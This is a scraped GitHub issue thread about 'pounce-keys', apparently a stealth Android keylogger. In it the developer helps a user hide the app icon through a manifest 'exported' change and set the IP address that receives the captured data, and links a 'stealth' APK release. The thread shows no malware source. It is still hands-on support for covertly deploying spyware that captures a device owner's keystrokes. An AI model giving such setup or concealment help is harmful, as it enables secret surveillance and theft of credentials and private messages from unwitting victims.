Code Monkey home page Code Monkey logo

Comments (5)

2picodin9 avatar 2picodin9 commented on August 22, 2024

@NullPounce please help me to address this issue!

from pounce-keys.

2picodin9 avatar 2picodin9 commented on August 22, 2024

Ops! I found out needed ip address to change in Pounce-Keys.apk. I didn't dowload lateast version of it so i couldn't found it

from pounce-keys.

2picodin9 avatar 2picodin9 commented on August 22, 2024

@NullPounce but i can't hide app icon from release 2.0

from pounce-keys.

NullPounce avatar NullPounce commented on August 22, 2024

what version of android? and sorry yes that has not been 100% implemented, whole recode, compare the older mainfest file as i think being exported to true is the issue, seen an error about android 10 and under but i still need to implement that, thank you.

<application
		android:allowBackup="true"
		android:icon="@drawable/bac"
		android:label="@string/app_name"
		android:theme="@style/AppTheme"
		android:resizeableActivity = "true">
		<activity
			android:name=".MainActivity"
			android:label="@string/app_name"
			android:exported="false">
			<intent-filter>

try changing "android:exported="false">"
to
android:exported="true">

and let me know if that helps, if not regardless i have some genymotion to spin up ha ha

from pounce-keys.

NullPounce avatar NullPounce commented on August 22, 2024

thank you for the notice very much! I have made a updated version and release right away. :)

here's a direct link to the new apk
https://github.com/NullPounce/pounce-keys/releases/download/2.1/pounce-keys-2.1-stealth.apk

release notes show the edits, let me know if this works.

from pounce-keys.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.